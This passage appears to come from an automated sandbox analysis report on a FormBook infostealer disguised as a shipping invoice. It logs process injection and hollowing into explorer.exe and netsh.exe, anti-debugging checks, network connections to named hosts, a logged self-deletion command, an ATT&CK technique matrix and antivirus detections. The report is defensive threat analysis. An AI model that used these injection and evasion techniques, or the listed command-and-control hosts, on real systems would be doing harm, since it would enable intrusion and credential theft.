          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10002EDC GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,GetCurrentThreadId,__freeptd,
          Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\netsh.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10004CBC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10002ECD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10007786 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Network Connect: 75.126.100.11 80
          Source: C:\Windows\explorer.exe Network Connect: 192.0.78.24 80
          Source: C:\Windows\explorer.exe Network Connect: 95.215.210.10 80
          Source: C:\Windows\explorer.exe Network Connect: 165.227.229.15 80
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Network Connect: 23.88.85.105 80
          Hijacks the control flow in another process
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 77165050 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 771650F0 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 77165180 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 77165190 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 771651A0 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 7717FEE0 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 771133C0 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 77114760 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 770D6590 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 770DB510 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 770FC490 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 7711EE00 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 7711EFD0 value: E9
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\cmd.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\cmd.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 9F0000
          Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
          Source: explorer.exe, 00000004.00000002.914158425.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.710156984.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10008C6C cpuid
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10004896 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Lowering of HIPS / PFW / Operating System Security Settings:

          Uses netsh to modify the Windows network and firewall settings
          Source: unknown | Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          The matrix is listed per tactic column. Techniques carrying a count in parentheses are the ones the report flagged for this sample; the count is the figure shown in the matrix cell.

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
          Execution: Native API (1); Shared Modules (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
          Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
          Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (612); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
          Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Install Root Certificate (1); Software Packing (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (3); Access Token Manipulation (1); Process Injection (612); Rundll32 (1)
          Credential Access: Credential API Hooking (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
          Discovery: System Time Discovery (1); File and Directory Discovery (2); System Information Discovery (124); Security Software Discovery (251); Virtualization/Sandbox Evasion (3); Process Discovery (2); Remote System Discovery (1); Network Service Scanning; System Network Connections Discovery; Process Discovery; Permission Groups Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
          Collection: Archive Collected Data (1); Credential API Hooking (1); Clipboard Data (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium
          Command and Control: Ingress Tool Transfer (3); Encrypted Channel (1); Non-Application Layer Protocol (3); Application Layer Protocol (3); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop

          Behavior Graph

          Behavior Graph ID: 323227; Sample: Shipping INVOICE-BL Shipment..exe; Start date: 26/11/2020; Architecture: WINDOWS; Score: 100

          Sample-level: DNS www.mapnimbis.com; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 5 other signatures

          Process chain recovered from the graph:
          • Shipping INVOICE-BL Shipment..exe (started)
            Dropped: C:\Users\user\AppData\Local\...\Prehnite.dll (PE32); C:\Users\user\AppData\Roaming\...\vjscsvr.exe (PE32); C:\Users\user\AppData\...\rcxditui.dll (PE32); 8 other files (none is malicious)
            • rundll32.exe (started): Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Hijacks the control flow in another process; Maps a DLL or memory area into another process
              • cmd.exe (started): Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; 3 other signatures
                • explorer.exe (injected): www.wtmailer15.com 75.126.100.11, 49769, 80 SOFTLAYERUS United States; wastie.club 95.215.210.10, 49770, 80 NEWIT-ASRU Russian Federation; 16 other IPs or domains; System process connects to network (likely due to code injection or exploit)
                  • netsh.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    • cmd.exe (started)
                      • conhost.exe (started)

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Shipping INVOICE-BL Shipment..exe | 28% | Virustotal | -
          Shipping INVOICE-BL Shipment..exe | 45% | ReversingLabs | Win32.Trojan.Woreflint

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll | 0% | Metadefender | -
          C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll | 0% | ReversingLabs | -
          C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll | 0% | Metadefender | -
          C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll | 2% | ReversingLabs | -
          C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe | 0% | Metadefender | -
          C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe | 0% | ReversingLabs | -
          C:\Users\user\AppData\Local\Temp\Prehnite.dll | 28% | ReversingLabs | Win32.Trojan.Wacatac
          C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe | 0% | Metadefender | -
          C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe | 3% | ReversingLabs | -
          C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll | 0% | Metadefender | -
          C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll | 0% | ReversingLabs | -

          Unpacked PE Files

          Source | Detection | Scanner | Label
          2.2.cmd.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.0.Shipping INVOICE-BL Shipment..exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          0.2.Shipping INVOICE-BL Shipment..exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains


                                                Contacted URLs


                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.comexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://openoffice.org/2001/block-listnse53A7.tmp.0.drfalse
                                                            high
                                                            http://www.tiro.comexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://nsis.sf.net/NSIS_ErrorErrorShipping INVOICE-BL Shipment..exefalse
                                                                high
                                                                http://www.goodfont.co.krexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.carterandcone.comlexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.typography.netDexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
